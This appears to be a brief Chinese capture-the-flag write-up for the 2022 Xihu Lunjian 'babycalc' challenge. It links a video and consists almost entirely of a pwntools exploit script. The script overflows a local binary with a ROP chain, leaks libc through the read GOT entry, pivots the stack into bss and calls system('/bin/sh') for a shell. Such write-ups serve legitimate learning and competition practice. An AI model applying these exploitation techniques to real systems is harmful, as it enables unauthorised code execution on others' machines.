本次wp首次尝试使用视频方式表示
视频地址:2022西湖论剑 babycalc复现_哔哩哔哩_bilibili
exp:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
| from pwn import*
io = process("./pwn")
context.log_level = "debug"
context.arch = "amd64"
elf = ELF("./pwn")
libc = ELF("./locate_libc2.23")
io.recvuntil(":")
ret_addr = 0x4005b9
rdi_addr = 0x400ca3
rsi_r15_addr = 0x400ca1
bss_addr = 0x602510
rsp_r13_r14_r15_addr = 0x400c9d
read_plt = 0x4005f0
read_got = elf.got['read']
puts_plt = 0x4005d0
payload = b'24'+cyclic(0x6)+p64(ret_addr)*17
payload += p64(rdi_addr)+p64(0)+p64(rsi_r15_addr)+p64(bss_addr)+p64(0)+p64(read_plt)+p64(rsp_r13_r14_r15_addr)+p64(bss_addr-0x18)
payload += p8(19)+p8(36)+p8(53)+p8(70)+p8(55)+p8(66)+p8(17)+p8(161)+p8(50)+p8(131)+p8(212)+p8(101)+p8(118)+p8(199)+p8(24)+p8(3)
payload = payload.ljust(0x100-0x4,b'\x00')
payload += p32(0x38)
io.send(payload)
payload = p64(rdi_addr)+p64(read_got)+p64(puts_plt)+p64(rdi_addr)+p64(0)+p64(rsi_r15_addr)+p64(bss_addr+0x48)+p64(0)+p64(read_plt)
io.sendline(payload)
read_addr = u64(io.recvuntil("\x7f")[-6:].ljust(8,b'\x00'))
success(hex(read_addr))
libc_addr = read_addr - libc.sym['read']
success(hex(libc_addr))
system_addr = libc_addr + libc.sym['system']
binsh_addr = libc_addr + next(libc.search(b"/bin/sh"))
payload = p64(ret_addr)+p64(rdi_addr)+p64(binsh_addr)+p64(system_addr)
io.sendline(payload)
io.interactive()
|